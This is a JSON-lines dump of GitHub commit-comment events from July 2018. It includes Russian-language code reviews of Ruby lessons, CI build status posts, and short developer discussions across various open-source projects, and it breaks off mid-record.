{"id":"8043120428","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29901543,"position":null,"line":null,"path":null,"commit_id":"609f0a68dd9493a8c90a4deeec0e8eca9dcb24a3","created_at":"2018-07-31T10:17:28Z","updated_at":"2018-07-31T10:17:28Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-31T10:17:28Z"}
{"id":"8043122815","type":"CommitCommentEvent","actor":{"login":"link3280"},"repo":{"name":"apache/flink"},"payload":{"comment":{"id":29901548,"position":null,"line":null,"path":null,"commit_id":"01811317d709ad54f1e0c105d5e3e6e36f85d24d","created_at":"2018-07-31T10:17:58Z","updated_at":"2018-07-31T10:17:58Z","author_association":"NONE","body":"Why is this commit reverted? I think it fixes the TM keytab problem."}},"created_at":"2018-07-31T10:17:58Z"}
{"id":"8043125709","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"kristalls/thinkneticaRoR"},"payload":{"comment":{"id":29901555,"position":17,"line":17,"path":"lesson3/route.rb","commit_id":"39c5261db340871f2f66cb19774b734d5b5d5643","created_at":"2018-07-31T10:18:33Z","updated_at":"2018-07-31T10:18:33Z","author_association":"NONE","body":"рабочий вариант, но лучше конечно сделать через итератор и выводить по одной станции"}},"created_at":"2018-07-31T10:18:33Z"}
{"id":"8043125848","type":"CommitCommentEvent","actor":{"login":"j3p0uk"},"repo":{"name":"electrofelix/devopsdays-web"},"payload":{"comment":{"id":29901556,"position":26,"line":31,"path":"content/events/2018-galway/propose.md","commit_id":"6961d05406e3b6e35df3fe5dbafa9ffd771e16f8","created_at":"2018-07-31T10:18:34Z","updated_at":"2018-07-31T10:18:34Z","author_association":"NONE","body":"measurable"}},"created_at":"2018-07-31T10:18:34Z"}
{"id":"8043125969","type":"CommitCommentEvent","actor":{"login":"SebasianG"},"repo":{"name":"SebasianG/chickAPP"},"payload":{"comment":{"id":29901557,"position":29,"line":29,"path":"css/style.css","commit_id":"aa42f842c733598d2bae2d7d22f20ee198108f90","created_at":"2018-07-31T10:18:36Z","updated_at":"2018-07-31T10:18:36Z","author_association":"OWNER","body":"test"}},"created_at":"2018-07-31T10:18:36Z"}
{"id":"8043130282","type":"CommitCommentEvent","actor":{"login":"akhsunna"},"repo":{"name":"Vita1ik/foot_calculator"},"payload":{"comment":{"id":29901570,"position":13,"line":13,"path":"spec/ingredient_spec.rb","commit_id":"c5b38d8944cf5d29f8f05bf83176076f298f7e86","created_at":"2018-07-31T10:19:26Z","updated_at":"2018-07-31T10:19:26Z","author_association":"NONE","body":"So with your descriptions, we have the following sentence:\r\n> describe #== when ingredient are equal it they are truly equal\r\nNot good\r\nWhy didn't you take the example of tests from the presentation?"}},"created_at":"2018-07-31T10:19:26Z"}
{"id":"8043130396","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"kristalls/thinkneticaRoR"},"payload":{"comment":{"id":29901571,"position":4,"line":4,"path":"lesson3/Station.rb","commit_id":"39c5261db340871f2f66cb19774b734d5b5d5643","created_at":"2018-07-31T10:19:27Z","updated_at":"2018-07-31T10:19:27Z","author_association":"NONE","body":"пустой хеш принято задавать так:\r\n```ruby\r\nhash = {}\r\n```"}},"created_at":"2018-07-31T10:19:27Z"}
{"id":"8043131649","type":"CommitCommentEvent","actor":{"login":"locutus2"},"repo":{"name":"Stefano80/Stockfish"},"payload":{"comment":{"id":29901575,"position":null,"line":null,"path":null,"commit_id":"0c4ba9385ead955a7015649e25af0de84ba97553","created_at":"2018-07-31T10:19:42Z","updated_at":"2018-07-31T10:19:42Z","author_association":"NONE","body":"@Stefano80 \r\nwe at least the verification for STC 8 threads i think its ok to commit. But we should not forget the failed LTC at 4 threads. This was simple unlucky or perhaps there is a relation between  number of threads and TC in the sense that for longer TC we need more threads to benefit. But probably it doesn't fall below zero elo for combination where this doesn't fit. But without tests we doesn't know.\r\n\r\nBut to see the scaling i let the LTC 32 threads as it is and perhaps sometime its finished.\r\n\r\nCongrats to patch!"}},"created_at":"2018-07-31T10:19:42Z"}
{"id":"8043133025","type":"CommitCommentEvent","actor":{"login":"j3p0uk"},"repo":{"name":"electrofelix/devopsdays-web"},"payload":{"comment":{"id":29901580,"position":56,"line":64,"path":"content/events/2018-galway/propose.md","commit_id":"6961d05406e3b6e35df3fe5dbafa9ffd771e16f8","created_at":"2018-07-31T10:20:00Z","updated_at":"2018-07-31T10:20:00Z","author_association":"NONE","body":"based on an anonymous version of your submission(s)"}},"created_at":"2018-07-31T10:20:00Z"}
{"id":"8043133158","type":"CommitCommentEvent","actor":{"login":"annevk"},"repo":{"name":"whatwg/dom"},"payload":{"comment":{"id":29901581,"position":21,"line":9303,"path":"dom.bs","commit_id":"826d66b551935a7b2af09a4afc2b839500bb6c0e","created_at":"2018-07-31T10:20:02Z","updated_at":"2018-07-31T10:20:02Z","author_association":"MEMBER","body":"Could you please file that as an issue with additional explanation?"}},"created_at":"2018-07-31T10:20:02Z"}
{"id":"8043157759","type":"CommitCommentEvent","actor":{"login":"j3p0uk"},"repo":{"name":"electrofelix/devopsdays-web"},"payload":{"comment":{"id":29901650,"position":null,"line":null,"path":null,"commit_id":"6961d05406e3b6e35df3fe5dbafa9ffd771e16f8","created_at":"2018-07-31T10:25:00Z","updated_at":"2018-07-31T10:25:00Z","author_association":"NONE","body":"Can you also fix a typo on the event location page?\r\n\r\n\"The Galmon Hotel & Spa is ideally\""}},"created_at":"2018-07-31T10:25:00Z"}
{"id":"8043161703","type":"CommitCommentEvent","actor":{"login":"dwy927"},"repo":{"name":"dwy927/ns-3-dev-git"},"payload":{"comment":{"id":29901654,"position":46,"line":4475,"path":"src/internet/model/tcp-socket-base.cc","commit_id":"0fcb2323f2aa1fb29256d7910d0899125f6b185f","created_at":"2018-07-31T10:25:50Z","updated_at":"2018-07-31T10:25:50Z","author_association":"OWNER","body":"if (false || cepDsafer > cepD)"}},"created_at":"2018-07-31T10:25:50Z"}
{"id":"8043162431","type":"CommitCommentEvent","actor":{"login":"sroughley"},"repo":{"name":"rdkit/knime-rdkit"},"payload":{"comment":{"id":29901655,"position":null,"line":null,"path":null,"commit_id":"4cd2d335f2c79f5d7f4791c12c6535d48b232ce9","created_at":"2018-07-31T10:25:58Z","updated_at":"2018-07-31T10:25:58Z","author_association":"NONE","body":"They sort of are (i.e. I thought so too!) but for plugin dependencies on individual plugins e.g. the `org.rdkit.knime.types` plugin, the version has stayed at 3.3.1.[timestamp], rather than the feature version, so the versions in the plugin MANIFEST.MF files (e.g. https://github.com/rdkit/knime-rdkit/blob/master/org.rdkit.knime.types/META-INF/MANIFEST.MF) need to be updated too\r\n\r\nSteve "}},"created_at":"2018-07-31T10:25:58Z"}
{"id":"8043163133","type":"CommitCommentEvent","actor":{"login":"locutus2"},"repo":{"name":"pb00068/Stockfish"},"payload":{"comment":{"id":29901656,"position":null,"line":null,"path":null,"commit_id":"c8cb5959f03b14b6962ef14732a38ef6b01fb325","created_at":"2018-07-31T10:26:07Z","updated_at":"2018-07-31T10:26:07Z","author_association":"NONE","body":"Really interesting idea. Good luck!\r\n\r\nPerhaps using only the to square for indexing and using an additional side to move index could  fit the idea of a plan better."}},"created_at":"2018-07-31T10:26:07Z"}
{"id":"8043163369","type":"CommitCommentEvent","actor":{"login":"RobvanderDoes"},"repo":{"name":"OpenViX/enigma2"},"payload":{"comment":{"id":29901657,"position":null,"line":null,"path":null,"commit_id":"ed689159e75bed8a8df56668bb3ca67d844468f6","created_at":"2018-07-31T10:26:10Z","updated_at":"2018-07-31T10:26:10Z","author_association":"MEMBER","body":"1- I fail to see any added value for a dual system. And as a long-term translator for ViX I can say I never missed any functionality.\r\n2- I have no idea what 'personal comments' you're referring to, but IMHO they're not related to this thread.\r\n3- I have no idea why you're involving 'personal comments' and foul language into this discussion."}},"created_at":"2018-07-31T10:26:10Z"}
{"id":"8043166048","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29901660,"position":null,"line":null,"path":null,"commit_id":"5423618217002d7a4b63ee843d08df79354bcd31","created_at":"2018-07-31T10:26:44Z","updated_at":"2018-07-31T10:26:44Z","author_association":"NONE","body":"develop (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2334 of 2334 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5423618217002d7a4b63ee843d08df79354bcd31-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5423618217002d7a4b63ee843d08df79354bcd31-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5423618217002d7a4b63ee843d08df79354bcd31-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.22%25-green.png)</a>\n"}},"created_at":"2018-07-31T10:26:44Z"}
{"id":"8043166406","type":"CommitCommentEvent","actor":{"login":"beheh"},"repo":{"name":"HearthSim/HSReplay.net"},"payload":{"comment":{"id":29901661,"position":27,"line":99,"path":"hsreplaynet/templates/account/email.html","commit_id":"d2c9badecf31bdd26f114696eef9ed0436ca0175","created_at":"2018-07-31T10:26:48Z","updated_at":"2018-07-31T10:26:48Z","author_association":"MEMBER","body":"As posted, it works correctly for me. Can you link me where it doesn't work? I don't see a reason not to use it otherwise."}},"created_at":"2018-07-31T10:26:48Z"}
{"id":"8043166876","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29901663,"position":null,"line":null,"path":null,"commit_id":"d9cbd5a8b49b617b269ba1338132ed25689cd486","created_at":"2018-07-31T10:26:54Z","updated_at":"2018-07-31T10:26:54Z","author_association":"COLLABORATOR","body":"TeamCity Solution Engineering / Packer Templates [Build 570](https://ci.hashicorp.engineering/viewLog.html?buildId=107922&buildTypeId=SolutionEngineering_PackerTemplates) is now running\n"}},"created_at":"2018-07-31T10:26:54Z"}
{"id":"8043168714","type":"CommitCommentEvent","actor":{"login":"SebasianG"},"repo":{"name":"SebasianG/chickAPP"},"payload":{"comment":{"id":29901668,"position":5,"line":48,"path":"index.html","commit_id":"683c1839bf03f24d8f29409feef77583846fb92d","created_at":"2018-07-31T10:27:18Z","updated_at":"2018-07-31T10:27:18Z","author_association":"OWNER","body":"test"}},"created_at":"2018-07-31T10:27:18Z"}
{"id":"8043176870","type":"CommitCommentEvent","actor":{"login":"RytoEX"},"repo":{"name":"obsproject/obs-browser"},"payload":{"comment":{"id":29901674,"position":null,"line":null,"path":null,"commit_id":"98fd1c211a01555b6a36a6edca23b585a957a74d","created_at":"2018-07-31T10:29:00Z","updated_at":"2018-07-31T10:29:00Z","author_association":"NONE","body":"Okay.  I was just confused when I first saw it, wondering when browser source got OCR."}},"created_at":"2018-07-31T10:29:00Z"}
{"id":"8043178700","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"kristalls/thinkneticaRoR"},"payload":{"comment":{"id":29901680,"position":17,"line":17,"path":"lesson3/Station.rb","commit_id":"39c5261db340871f2f66cb19774b734d5b5d5643","created_at":"2018-07-31T10:29:23Z","updated_at":"2018-07-31T10:29:23Z","author_association":"NONE","body":"что-то я не уверен, что этот код будет работать, как задумывалось )\r\nпопробуй его в irb (небольшая ошибка внутри блока)\r\n"}},"created_at":"2018-07-31T10:29:23Z"}
{"id":"8043180434","type":"CommitCommentEvent","actor":{"login":"qm3ster"},"repo":{"name":"vuetifyjs/api-generator"},"payload":{"comment":{"id":29901682,"position":16,"line":157,"path":"src/index.js","commit_id":"d797574f93d83efb755890d2ad2d6aa725110e05","created_at":"2018-07-31T10:29:44Z","updated_at":"2018-07-31T10:29:44Z","author_association":"NONE","body":"Lmao, I'm calling the :oncoming_police_car: "}},"created_at":"2018-07-31T10:29:44Z"}
{"id":"8043182381","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29901687,"position":null,"line":null,"path":null,"commit_id":"8bfccc05ccd263e24a411c6217f19e23df6caf7c","created_at":"2018-07-31T10:30:10Z","updated_at":"2018-07-31T10:30:10Z","author_association":"NONE","body":"expanded-runperiod (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8bfccc05ccd263e24a411c6217f19e23df6caf7c-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-31T10:30:10Z"}
{"id":"8043185780","type":"CommitCommentEvent","actor":{"login":"soltester"},"repo":{"name":"ericklombardo/SqlBulkTools"},"payload":{"comment":{"id":29901692,"position":null,"line":null,"path":null,"commit_id":"44a065269142e2b4bcab28c6dbf789c47b940d7a","created_at":"2018-07-31T10:30:53Z","updated_at":"2018-07-31T10:30:53Z","author_association":"NONE","body":"Hello Erick,\r\n First off all, thanks for working on this great repo!\r\nDo you know why it was removed from Nuget package manager?\r\n\r\nThanks in advance, Sol"}},"created_at":"2018-07-31T10:30:53Z"}
{"id":"8043191683","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"kristalls/thinkneticaRoR"},"payload":{"comment":{"id":29901703,"position":20,"line":20,"path":"lesson3/Station.rb","commit_id":"39c5261db340871f2f66cb19774b734d5b5d5643","created_at":"2018-07-31T10:32:02Z","updated_at":"2018-07-31T10:32:02Z","author_association":"NONE","body":"этот метод почему-то называется точно так же, как и предыдущий\r\nи функциоанльность его тоже не очень ясна, но это видимо из-за того, что у тебя методы прринимают в аргументах не объекты класса Трейн, а аттрибуты (тип)"}},"created_at":"2018-07-31T10:32:02Z"}
{"id":"8043193444","type":"CommitCommentEvent","actor":{"login":"arduino-ci-script-bot"},"repo":{"name":"per1234/arduino-ci-script"},"payload":{"comment":{"id":29901705,"position":null,"line":null,"path":null,"commit_id":"8083d203ac7a4288dd05fc94b0921587d781f134","created_at":"2018-07-31T10:32:20Z","updated_at":"2018-07-31T10:32:20Z","author_association":"NONE","body":"Once completed, the job reports for Travis CI [build 764](https://travis-ci.org/per1234/arduino-ci-script/builds/410254258) will be found at:\nhttps://gist.github.com/arduino-ci-script-bot/9371a7dedb73a560142ff2ca514b79db#file-travis_ci_job_report_00764-001-tsv"}},"created_at":"2018-07-31T10:32:20Z"}
{"id":"8043194242","type":"CommitCommentEvent","actor":{"login":"arduino-ci-script-bot"},"repo":{"name":"per1234/arduino-ci-script"},"payload":{"comment":{"id":29901706,"position":null,"line":null,"path":null,"commit_id":"8083d203ac7a4288dd05fc94b0921587d781f134","created_at":"2018-07-31T10:32:28Z","updated_at":"2018-07-31T10:32:28Z","author_association":"NONE","body":"Once completed, the job reports for Travis CI [build 764](https://travis-ci.org/per1234/arduino-ci-script/builds/410254258) will be found at:\nhttps://github.com/per1234/CI-reports/tree/arduino-ci-script/build_00764"}},"created_at":"2018-07-31T10:32:28Z"}
{"id":"8043201537","type":"CommitCommentEvent","actor":{"login":"elevinskii"},"repo":{"name":"elevinskii/magento2-theme-deepfish"},"payload":{"comment":{"id":29901722,"position":60,"line":60,"path":"app/code/DeepFish/CatalogSearch/Override/Model/Autocomplete/DataProvider.php","commit_id":"5356395f6a9726c8cbeefe20629523cc38556e86","created_at":"2018-07-31T10:33:56Z","updated_at":"2018-07-31T10:33:56Z","author_association":"OWNER","body":"Check query text"}},"created_at":"2018-07-31T10:33:56Z"}
{"id":"8043203764","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29901731,"position":null,"line":null,"path":null,"commit_id":"00b7483b5b50f7e4bb5018976b57fec6cbe53cd4","created_at":"2018-07-31T10:34:24Z","updated_at":"2018-07-31T10:34:24Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-31T10:34:24Z"}
{"id":"8043205166","type":"CommitCommentEvent","actor":{"login":"elevinskii"},"repo":{"name":"elevinskii/magento2-theme-deepfish"},"payload":{"comment":{"id":29901734,"position":66,"line":66,"path":"app/code/DeepFish/CatalogSearch/Override/Model/Autocomplete/DataProvider.php","commit_id":"5356395f6a9726c8cbeefe20629523cc38556e86","created_at":"2018-07-31T10:34:42Z","updated_at":"2018-07-31T10:34:42Z","author_association":"OWNER","body":"set Limit"}},"created_at":"2018-07-31T10:34:42Z"}
{"id":"8043208547","type":"CommitCommentEvent","actor":{"login":"LM239"},"repo":{"name":"L4443/ChessChampion99999"},"payload":{"comment":{"id":29901739,"position":null,"line":null,"path":null,"commit_id":"ab50127ba5aecf8a3967948c8afd3a6e17472614","created_at":"2018-07-31T10:35:26Z","updated_at":"2018-07-31T10:35:26Z","author_association":"NONE","body":"wooow"}},"created_at":"2018-07-31T10:35:26Z"}
{"id":"8043209841","type":"CommitCommentEvent","actor":{"login":"elevinskii"},"repo":{"name":"elevinskii/magento2-theme-deepfish"},"payload":{"comment":{"id":29901744,"position":10,"line":12,"path":"app/design/frontend/IdealCode/DeepFish/Magento_Search/layout/default.xml","commit_id":"5356395f6a9726c8cbeefe20629523cc38556e86","created_at":"2018-07-31T10:35:43Z","updated_at":"2018-07-31T10:35:43Z","author_association":"OWNER","body":"searchForm"}},"created_at":"2018-07-31T10:35:43Z"}
{"id":"8043211205","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"kristalls/thinkneticaRoR"},"payload":{"comment":{"id":29901746,"position":9,"line":9,"path":"lesson3/train.rb","commit_id":"39c5261db340871f2f66cb19774b734d5b5d5643","created_at":"2018-07-31T10:36:01Z","updated_at":"2018-07-31T10:36:01Z","author_association":"NONE","body":"в задании:\r\n\"Может набирать скорость\"\r\nэто подразумевает, не то, что скорость можно устанавливать в любое значение, а то, что в методе с названием (к примеру) `increase_speed(value)` нужно сделать добавление скорости к текущей"}},"created_at":"2018-07-31T10:36:01Z"}
{"id":"8043213397","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"kristalls/thinkneticaRoR"},"payload":{"comment":{"id":29901751,"position":17,"line":17,"path":"lesson3/train.rb","commit_id":"39c5261db340871f2f66cb19774b734d5b5d5643","created_at":"2018-07-31T10:36:28Z","updated_at":"2018-07-31T10:36:28Z","author_association":"NONE","body":"в задании:\r\n\"Может тормозить (сбрасывать скорость до нуля)\"\r\n\r\nметод реализован в виде стопкрана, т.е. скорость сразу сбрасывается до нуля\r\n(в задании возможно не очень ясная формулировка, но она означает, что поезд может тормозить и это не обязательно должно быть полное торможение, фраза же \"сбрасывать скорость до нуля\" означает, \"обратите внимание! скорость не должна быть меньше нуля\" :) )\r\n\r\nлучше, чтобы метод принимал значение (аналогично `increase_speed`)"}},"created_at":"2018-07-31T10:36:28Z"}
{"id":"8043213446","type":"CommitCommentEvent","actor":{"login":"ianpartridge"},"repo":{"name":"IBM-Swift/Kitura"},"payload":{"comment":{"id":29901752,"position":68,"line":1224,"path":"Tests/KituraTests/TestResponse.swift","commit_id":"41fc25f31ccda13653b4d4ffff97fb0e754459da","created_at":"2018-07-31T10:36:29Z","updated_at":"2018-07-31T10:36:29Z","author_association":"MEMBER","body":"I think this will be calling the existing `send()` function which takes a `String`, not your new `String?` one.  To force it through the function you want to test, you'll need be explicit about the type - something like this:\r\n\r\n```swift\r\nlet str: String? = nil\r\ntry response.send(str).end()\r\n```"}},"created_at":"2018-07-31T10:36:29Z"}
{"id":"8043215452","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29901754,"position":null,"line":null,"path":null,"commit_id":"d9cbd5a8b49b617b269ba1338132ed25689cd486","created_at":"2018-07-31T10:36:55Z","updated_at":"2018-07-31T10:36:55Z","author_association":"COLLABORATOR","body":"TeamCity Solution Engineering / Packer Templates [Build 570](https://ci.hashicorp.engineering/viewLog.html?buildId=107922&buildTypeId=SolutionEngineering_PackerTemplates) outcome was **FAILURE**\nSummary: Exit code 1 Build time: 00:10:00"}},"created_at":"2018-07-31T10:36:55Z"}
{"id":"8043217334","type":"CommitCommentEvent","actor":{"login":"ianpartridge"},"repo":{"name":"IBM-Swift/Kitura"},"payload":{"comment":{"id":29901756,"position":60,"line":1216,"path":"Tests/KituraTests/TestResponse.swift","commit_id":"41fc25f31ccda13653b4d4ffff97fb0e754459da","created_at":"2018-07-31T10:37:21Z","updated_at":"2018-07-31T10:37:21Z","author_association":"MEMBER","body":"This probably does call the right overload, but it would be clearer to do:\r\n\r\n```swift\r\nlet str: String? = nil\r\ntry response.send(str).end()\r\n```"}},"created_at":"2018-07-31T10:37:21Z"}
{"id":"8043221775","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"kristalls/thinkneticaRoR"},"payload":{"comment":{"id":29901761,"position":12,"line":12,"path":"lesson3/train.rb","commit_id":"39c5261db340871f2f66cb19774b734d5b5d5643","created_at":"2018-07-31T10:38:17Z","updated_at":"2018-07-31T10:38:17Z","author_association":"NONE","body":"ТЗ: \"Может возвращать текущую скорость\"\r\nв данном случае у тебя метод занимается выводом информации на экран, вместо того чтобы просто вернуть при вызове какие-то, ожидаемые от него данные"}},"created_at":"2018-07-31T10:38:17Z"}
{"id":"8043224540","type":"CommitCommentEvent","actor":{"login":"odony"},"repo":{"name":"odoo/odoo"},"payload":{"comment":{"id":29901764,"position":10,"line":193,"path":"addons/purchase/models/stock.py","commit_id":"3869cdf7d8202c8157c1134d74549b3096758253","created_at":"2018-07-31T10:38:53Z","updated_at":"2018-07-31T10:38:53Z","author_association":"CONTRIBUTOR","body":"Hmm yes, our goal for Odoo 11 (and Odoo 11 only) is not to break compatibility with P2 on purpose. We do not guarantee it (in the sense that we don't dual-build everything in P2 on runbot), but if we can avoid breaking it, we should.\r\nFor anything beyond Odoo 11, only P3 will be supported."}},"created_at":"2018-07-31T10:38:53Z"}
{"id":"8043225440","type":"CommitCommentEvent","actor":{"login":"killerwife"},"repo":{"name":"cmangos/mangos-classic"},"payload":{"comment":{"id":29901765,"position":null,"line":null,"path":null,"commit_id":"9434908f43bfe4e3ad466be85e2e115990b32a2f","created_at":"2018-07-31T10:39:03Z","updated_at":"2018-07-31T10:39:03Z","author_association":"CONTRIBUTOR","body":"No it is not already ok elsewhere. I have been stealthily fixing spells in scripts:\r\n\r\nhttps://github.com/cmangos/mangos-tbc/commit/740a651ead5f63f233de0448391cb87ed922dd31\r\n\r\nThese commits are directly related to this wrong filling of castspell with a target. Whats worse, you can look at FillTargetMap, that function is the epitome of the lack of understanding of targeting. When I am looking at scripts, I always review how the spells are cast in packets, and sometimes I do these adjustment. This is ofc not applicable to vanilla for the most part due to the lack of sniffs.\r\n\r\nBiggest offender for example is adding target to CastSpell when there is TARGET_SELF, all of these have no targets in sniffs.\r\n\r\nThere are targets which explicitly expect target in SMSG_SPELL_START, one of them being TARGET_CHAIN_DAMAGE, or from destination targets, TARGET_CURRENT_ENEMY_COORDINATES. Most of them do not need a supplied target, and for some, like the ones with the attribute it can be malicious."}},"created_at":"2018-07-31T10:39:03Z"}
{"id":"8043226953","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"kristalls/thinkneticaRoR"},"payload":{"comment":{"id":29901770,"position":20,"line":20,"path":"lesson3/train.rb","commit_id":"39c5261db340871f2f66cb19774b734d5b5d5643","created_at":"2018-07-31T10:39:22Z","updated_at":"2018-07-31T10:39:22Z","author_association":"NONE","body":"то же что с методом \"спид\"\r\nэтот метод печатает, т.е. выводит на печать\r\nа нужно, чтобы возвращал"}},"created_at":"2018-07-31T10:39:22Z"}
{"id":"8043228207","type":"CommitCommentEvent","actor":{"login":"SOF3"},"repo":{"name":"Hyroxing/AntiSpam"},"payload":{"comment":{"id":29901772,"position":null,"line":null,"path":null,"commit_id":"99e111c1fb23986bf846b0f56deb471574be6f1c","created_at":"2018-07-31T10:39:39Z","updated_at":"2018-07-31T10:39:39Z","author_association":"NONE","body":"> Dear @Hyroxing:\n> Regarding the release you submitted, named \"**AntiSpam**\" (v2.0.3), for the project [Anti-Spam-iTzFreeHD](https://poggit.pmmp.io/ci/Hyroxing/AntiSpam/Anti-Spam-iTzFreeHD) on 2018-06-23T10:58:08.000Z, there are some problems with the values in the submit form.\n\nPlugin description in English is required. You may use German, but there must be an English part.\n\n> Your release has been reset to draft. Please [edit the release](https://poggit.pmmp.io/edit/Hyroxing/AntiSpam/Anti-Spam-iTzFreeHD/1) to resolve these problems, then click \"Submit\" on the edit page to have the plugin reviewed again.\n> Note: This comment is created here because this is the last commit when the released build was created."}},"created_at":"2018-07-31T10:39:39Z"}
{"id":"8043228834","type":"CommitCommentEvent","actor":{"login":"dh7hong"},"repo":{"name":"dh7hong/test-repo"},"payload":{"comment":{"id":29901774,"position":null,"line":null,"path":null,"commit_id":"16e67967166571537dbed9ed35c96b3e9ded066c","created_at":"2018-07-31T10:39:47Z","updated_at":"2018-07-31T10:39:47Z","author_association":"OWNER","body":"This is a comment made on the Committed Feature Branch (readme-edits) after editing/committing Feature Branch remotely"}},"created_at":"2018-07-31T10:39:47Z"}
{"id":"8043231310","type":"CommitCommentEvent","actor":{"login":"kor0p"},"repo":{"name":"kor0p/xo-telegram"},"payload":{"comment":{"id":29901778,"position":null,"line":null,"path":null,"commit_id":"72e2550b041e450824b11f9245f9f1c207afd23a","created_at":"2018-07-31T10:40:17Z","updated_at":"2018-07-31T10:40:17Z","author_association":"OWNER","body":"Also fixed bug, when user was unable to play for the same query in text holder"}},"created_at":"2018-07-31T10:40:17Z"}
{"id":"8043232626","type":"CommitCommentEvent","actor":{"login":"pavellauko"},"repo":{"name":"jes/isopath"},"payload":{"comment":{"id":29901781,"position":146,"line":108,"path":"public/js/stonejs.js","commit_id":"31045a9cdbb6a38597e1d8d5463e87f86ece564c","created_at":"2018-07-31T10:40:34Z","updated_at":"2018-07-31T10:40:34Z","author_association":"CONTRIBUTOR","body":"There was my change for handling html title attribute. But it is not used in isopath app yet so newest version is better."}},"created_at":"2018-07-31T10:40:34Z"}
{"id":"8043233492","type":"CommitCommentEvent","actor":{"login":"elevinskii"},"repo":{"name":"elevinskii/magento2-theme-deepfish"},"payload":{"comment":{"id":29901782,"position":19,"line":19,"path":"app/design/frontend/IdealCode/DeepFish/Magento_Search/web/js/form.js","commit_id":"5356395f6a9726c8cbeefe20629523cc38556e86","created_at":"2018-07-31T10:40:45Z","updated_at":"2018-07-31T10:40:45Z","author_association":"OWNER","body":"typo"}},"created_at":"2018-07-31T10:40:45Z"}
{"id":"8043233905","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"kristalls/thinkneticaRoR"},"payload":{"comment":{"id":29901785,"position":12,"line":12,"path":"lesson3/train.rb","commit_id":"39c5261db340871f2f66cb19774b734d5b5d5643","created_at":"2018-07-31T10:40:50Z","updated_at":"2018-07-31T10:40:50Z","author_association":"NONE","body":"разные методы возвращают разные значения, например `puts` возвращает `nil`, но при этом выводит полученные аргументы на печать в консоли\r\n\r\nесли написать в консоли свой метод, который будет складывать 1 и 2, то он **вернет** 3\r\nвот так:\r\n```\r\nirb\r\n2.5.0 :001 > def some_method\r\n2.5.0 :002?>   1 + 2\r\n2.5.0 :003?>   end\r\n => :some_method\r\n2.5.0 :004 > some_method\r\n => 3\r\n2.5.0 :005 > a = some_method\r\n => 3\r\n2.5.0 :006 > a\r\n => 3\r\n2.5.0 :007 >\r\n```\r\nвидно, что если результат работы метода присвоить переменной, то в ней окажется значение 3, т.е. результат вычислений... потому что именно его **возвращает** метод\r\n\r\nа можно переписать этот же метод, так, что он будет **выводить** значение:\r\n\r\n```\r\nirb\r\n2.5.0 :001 > def some_method\r\n2.5.0 :002?>   puts 1 + 2\r\n2.5.0 